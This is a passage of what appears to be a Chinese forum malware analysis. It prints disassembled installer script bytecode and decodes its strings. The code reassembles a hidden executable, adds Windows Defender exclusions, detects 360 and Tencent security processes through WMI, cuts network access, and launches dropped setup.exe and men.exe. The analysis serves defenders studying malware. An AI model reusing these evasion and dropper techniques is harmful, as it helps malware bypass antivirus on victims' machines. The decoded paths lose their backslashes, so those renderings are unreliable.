S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(9)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype S32 ; StackCount = 17    assign Var17, S32(7)    pushvar Var16 ; StackCount = 18    call SETARRAYLENGTH    pop ; StackCount = 17    pop ; StackCount = 16    assign Var16[0], S32(99)    assign Var16[1], S32(109)    assign Var16[2], S32(100)    assign Var16[3], S32(46)    assign Var16[4], S32(101)    assign Var16[5], S32(120)    assign Var16[6], S32(101)    assign Var15, Var16    pop ; StackCount = 15    pushvar Var14 ; StackCount = 16    call STRFROMCODE    pop ; StackCount = 15    pop ; StackCount = 14    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    call OBFUSCATEDEXTRACT    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(51)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(120)    assign Var9[27], S32(56)    assign Var9[28], S32(54)    assign Var9[29], S32(45)    assign Var9[30], S32(77)    assign Var9[31], S32(105)    assign Var9[32], S32(99)    assign Var9[33], S32(114)    assign Var9[34], S32(111)    assign Var9[35], S32(115)    assign Var9[36], S32(111)    assign Var9[37], S32(102)    assign Var9[38], S32(116)    assign Var9[39], S32(45)    assign Var9[40], S32(87)    assign Var9[41], S32(105)    assign Var9[42], S32(110)    assign Var9[43], S32(100)    assign Var9[44], S32(111)    assign Var9[45], S32(119)    assign Var9[46], S32(115)    assign Var9[47], S32(100)    assign Var9[48], S32(97)    assign Var9[49], S32(116)    assign Var9[50], S32(97)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var2 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(36)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(83)    assign Var9[27], S32(101)    assign Var9[28], S32(114)    assign Var9[29], S32(118)    assign Var9[30], S32(101)    assign Var9[31], S32(114)    assign Var9[32], S32(46)    assign Var9[33], S32(108)    assign Var9[34], S32(111)    assign Var9[35], S32(103)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var3 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype WideString ; StackCount = 8    assign Var8, Var2    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(11)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(83)    assign Var11[2], S32(101)    assign Var11[3], S32(114)    assign Var11[4], S32(118)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(46)    assign Var11[8], S32(108)    assign Var11[9], S32(111)    assign Var11[10], S32(103)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var4, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var2    pushvar Var8 ; StackCount = 10    call FORCEDIRECTORIES    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var3    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_435a    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_4326    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call DELETEFILE    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_4326:    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushtype UnicodeString_2 ; StackCount = 10    assign Var10, Var3    pushvar Var8 ; StackCount = 11    call RENAMEFILE    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_435a:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(26)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var11[25], S32(92)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(9)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(115)    assign Var11[1], S32(101)    assign Var11[2], S32(116)    assign Var11[3], S32(117)    assign Var11[4], S32(112)    assign Var11[5], S32(46)    assign Var11[6], S32(101)    assign Var11[7], S32(120)    assign Var11[8], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var6, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var6    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_47cd    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(5)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var6    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_47cd:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(25)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(8)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(109)    assign Var11[2], S32(101)    assign Var11[3], S32(110)    assign Var11[4], S32(46)    assign Var11[5], S32(101)    assign Var11[6], S32(120)    assign Var11[7], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var5, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var5    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_4c1a    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var5    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_4c1a:    ret
这个函数包含多个ASCII码数组,用于构建字符串并执行各种操作。
以下是所有数组的ASCII码还原结果及其对应的字符串:

  1. 第一个数组(12字节)ASCII码:47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 34字符串:"/c copy /b ""

  2. 第二个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"

  3. 第三个数组(13字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 51, 34, 32, 43, 32, 34字符串:"unzip.3" + ""

  4. 第四个数组(11字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 50, 34, 32, 34字符串:"unzip.2" ""

  5. 第五个数组(21字节)ASCII码:92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101, 34, 32, 38, 38, 32, 100, 101, 108, 32, 34字符串:"funzip.exe" && del ""

  6. 第六个数组(9字节)ASCII码:92, 117, 110, 122, 105, 112, 46, 50, 34字符串:"unzip.2""

  7. 第七个数组(7字节)ASCII码:99, 109, 100, 46, 101, 120, 101字符串:"cmd.exe"

  8. 第八个数组(51字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 120, 56, 54, 45, 77, 105, 99, 114, 111, 115, 111, 102, 116, 45, 87, 105, 110, 100, 111, 119, 115, 100, 97, 116, 97字符串:"C:UsersPublicDocumentsx86-Microsoft-Windowsdata"

  9. 第九个数组(36字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 83, 101, 114, 118, 101, 114, 46, 108, 111, 103字符串:"C:UsersPublicDocumentsServer.log"

  10. 第十个数组(11字节)ASCII码:92, 83, 101, 114, 118, 101, 114, 46, 108, 111, 103字符串:"Server.log"

  11. 第十一个数组(26字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92字符串:"C:UsersPublicDocuments"

  12. 第十二个数组(9字节)ASCII码:115, 101, 116, 117, 112, 46, 101, 120, 101字符串:"setup.exe"

  13. 第十三个数组(8字节)ASCII码:92, 109, 101, 110, 46, 101, 120, 101字符串:"men.exe"

该函数执行以下功能:
  1. 执行cmd.exe /c copy /b /y,将C:UsersPublicDocumentsunzip.3和unzip.2合并为funzip.exe
  2. 删除unzip.3和unzip.2文件
  3. 调用ADDDEFENDEREXCLUSION、OBFUSCATEDEXTRACT等函数(如果360Tray.exe进程存在则会先调用ADDDEFENDEREXCLUSION和DISABLENETWORKADAPTERS执行断网操作)
  4. 使用C:UsersPublicDocuments作为工作目录,创建x86-Microsoft-Windowsdata子目录,即创建C:UsersPublicDocumentsx86-Microsoft-Windowsdata目录
  5. 使用EXEC函数执行setup.exe、men.exe等文件,即使用EXEC函数执行C:UsersPublicDocumentssetup.exe和C:UsersPublicDocumentsmen.exe等文件

该函数会检测360主防进程——若存在,则执行断网,具体如下:该函数会调用代码中的“IS360PROCESSRUNNING”函数判断360主防进程"360Tray.exe"是否存在,从而执行不同的逻辑。检查360进程是否运行:

相关话题

关键词: 软件
分享到 淘江湖 新浪 QQ微博 QQ空间 开心 人人 豆瓣 网易微博 百度 鲜果 白社会 飞信
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
回复 引用
举报
z3960 
级别: FLY版主
发帖
861718
飞翔币
127803
威望
325932
飞扬币
3918562
信誉值
8
只看该作者 1 发表于: 2小时前

该函数会检测360主防进程——若存在,则执行断网,具体如下:该函数会调用代码中的“IS360PROCESSRUNNING”函数判断360主防进程"360Tray.exe"是否存在,从而执行不同的逻辑。检查360进程是否运行: 复制代码 隐藏代码; 第8-14行代码pushtype BOOLEAN ; StackCount = 8pushvar Var8 ; StackCount = 9call INITIALIZESETUP ; 初始化设置pop ; StackCount = 8pop ; StackCount = 7pushvar Var1 ; StackCount = 8call IS360PROCESSRUNNING ; 检查360安全卫士进程是否正在运行pop ; StackCount = 7
检查结果和条件跳转: 复制代码 隐藏代码; 第15-22行代码pushtype BOOLEAN ; StackCount = 8assign Var8, Var1 ; 检查函数"IS360PROCESSRUNNING"的返回值(存储在Var1中)赋给变量Var8,用于后续判断setz Var8 ; 检查Var8的值是否为假(0)sfz Var8 ; 根据sfz指令的判断结果,如果Var8为假(即360进程没有运行),则跳转到标签loc_263f处执行pop ; StackCount = 7jf loc_263f
执行路径:如果360进程在运行:继续执行当前代码块(从第23行开始),然后调用"ADDDEFENDEREXCLUSION"(添加Windows Defender排除项)和"OBFUSCATEDEXTRACT"如果360进程不在运行:跳转到loc_263f标签处执行,那里会先调用"ADDDEFENDEREXCLUSION"(添加Windows Defender排除项)和"DISABLENETWORKADAPTERS"(断网)
我们来看一下"IS360PROCESSRUNNING"函数: 复制代码 隐藏代码.function(export) BOOLEAN IS360PROCESSRUNNING()        pushtype Variant ; StackCount = 1        pushtype Variant ; StackCount = 2        pushtype Variant ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        assign RetVal, BOOLEAN(0)        starteh null, loc_8a1, null, loc_8af        pushtype IDISPATCH ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(26)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(87)        assign Var11[1], S32(66)        assign Var11[2], S32(69)        assign Var11[3], S32(77)        assign Var11[4], S32(83)        assign Var11[5], S32(99)        assign Var11[6], S32(114)        assign Var11[7], S32(105)        assign Var11[8], S32(112)        assign Var11[9], S32(116)        assign Var11[10], S32(105)        assign Var11[11], S32(110)        assign Var11[12], S32(103)        assign Var11[13], S32(46)        assign Var11[14], S32(83)        assign Var11[15], S32(87)        assign Var11[16], S32(66)        assign Var11[17], S32(69)        assign Var11[18], S32(77)        assign Var11[19], S32(76)        assign Var11[20], S32(111)        assign Var11[21], S32(99)        assign Var11[22], S32(97)        assign Var11[23], S32(116)        assign Var11[24], S32(111)        assign Var11[25], S32(114)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call CREATEOLEOBJECT        pop ; StackCount = 9        pop ; StackCount = 8        assign Var1, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(2)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], String_3("")        assign Var9[1], String_3("root\cimv2")        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ConnectServer")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var1        pushvar Var2 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(51)        assign Var9[1], S32(54)        assign Var9[2], S32(48)        assign Var9[3], S32(116)        assign Var9[4], S32(114)        assign Var9[5], S32(97)        assign Var9[6], S32(121)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var5 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(51)        assign Var9[1], S32(54)        assign Var9[2], S32(48)        assign Var9[3], S32(84)        assign Var9[4], S32(114)        assign Var9[5], S32(97)        assign Var9[6], S32(121)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var6 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(12)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(81)        assign Var9[1], S32(81)        assign Var9[2], S32(80)        assign Var9[3], S32(67)        assign Var9[4], S32(84)        assign Var9[5], S32(114)        assign Var9[6], S32(97)        assign Var9[7], S32(121)        assign Var9[8], S32(46)        assign Var9[9], S32(101)        assign Var9[10], S32(120)        assign Var9[11], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var7 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        assign Var8, String_3("SELECT * FROM Win32_Process WHERE Name="")        add Var8, Var5        add Var8, String_3("" OR ")        add Var8, String_3("Name="")        add Var8, Var6        add Var8, String_3("" OR ")        add Var8, String_3("Name="")        add Var8, Var7        add Var8, Char(""")        assign Var4, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(1)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], Var4        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ExecQuery")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var2        pushvar Var3 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Variant ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype !OPENARRAYOFVARIANT ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(0)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var9, Var10        pop ; StackCount = 9        pushtype String_3 ; StackCount = 10        assign Var10, String_3("Count")        pushtype BOOLEAN ; StackCount = 11        assign Var11, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 12        assign Var12, Var3        pushvar Var8 ; StackCount = 13        call IDISPATCHINVOKE        pop ; StackCount = 12        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        gt RetVal, Var8, S32(0)        pop ; StackCount = 7        endtryloc_8a1:        assign RetVal, BOOLEAN(0)        endcatchloc_8af:        ret
这个函数包含多个ASCII码数组,用于构建字符串来检查360安全卫士进程是否在运行。
以下是所有数组的ASCII码还原结果及其对应的字符串:

  1. 第一个数组(26字节)ASCII码:87, 66, 69, 77, 83, 99, 114, 105, 112, 116, 105, 110, 103, 46, 83, 87, 66, 69, 77, 76, 111, 99, 97, 116, 111, 114字符串:"WBEMScripting.SWBEMLocator"

  2. 第二个数组(11字节)ASCII码:51, 54, 48, 116, 114, 97, 121, 46, 101, 120, 101字符串:"360tray.exe"

  3. 第三个数组(11字节)ASCII码:51, 54, 48, 84, 114, 97, 121, 46, 101, 120, 101字符串:"360Tray.exe"

  4. 第四个数组(12字节)ASCII码:81, 81, 80, 67, 84, 114, 97, 121, 46, 101, 120, 101字符串:"QQPCTray.exe"

该函数通过WMI查询系统进程,检查360安全卫士的进程是否在运行:
  1. 创建WMI对象:创建WBEMScripting.SWBEMLocator对象
  2. 连接WMI服务:连接到rootcimv2命名空间
  3. 构建查询字符串:查询以下三个进程名之一是否存在:360tray.exe360Tray.exeQQPCTray.exe
  4. 执行查询:通过WQL查询Win32_Process表
  5. 检查结果:如果查询返回的进程计数大于0,则返回True,表示360进程在运行;否则返回False

最终构建的WQL查询语句为:SELECT * FROM Win32_Process WHERE Name="360tray.exe" OR Name="360Tray.exe" OR Name="QQPCTray.exe"
再来看"DISABLENETWORKADAPTERS"函数: 复制代码 隐藏代码.function(export) void DISABLENETWORKADAPTERS()        pushtype S32 ; StackCount = 1        pushtype BOOLEAN ; StackCount = 2        pushtype Pointer ; StackCount = 3        setptr Var3, Var1        pushtype U8_4 ; StackCount = 4        assign Var4, U8_4(1)        pushtype S32 ; StackCount = 5        assign Var5, S32(0)        pushtype UnicodeString_2 ; StackCount = 6        assign Var6, String_3("")        pushtype UnicodeString_2 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(36)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(97)        assign Var9[1], S32(100)        assign Var9[2], S32(118)        assign Var9[3], S32(102)        assign Var9[4], S32(105)        assign Var9[5], S32(114)        assign Var9[6], S32(101)        assign Var9[7], S32(119)        assign Var9[8], S32(97)        assign Var9[9], S32(108)        assign Var9[10], S32(108)        assign Var9[11], S32(32)        assign Var9[12], S32(115)        assign Var9[13], S32(101)        assign Var9[14], S32(116)        assign Var9[15], S32(32)        assign Var9[16], S32(97)        assign Var9[17], S32(108)        assign Var9[18], S32(108)        assign Var9[19], S32(112)        assign Var9[20], S32(114)        assign Var9[21], S32(111)        assign Var9[22], S32(102)        assign Var9[23], S32(105)        assign Var9[24], S32(108)        assign Var9[25], S32(101)        assign Var9[26], S32(115)        assign Var9[27], S32(32)        assign Var9[28], S32(115)        assign Var9[29], S32(116)        assign Var9[30], S32(97)        assign Var9[31], S32(116)        assign Var9[32], S32(101)        assign Var9[33], S32(32)        assign Var9[34], S32(111)        assign Var9[35], S32(110)        assign Var8, Var9        pop ; StackCount = 8        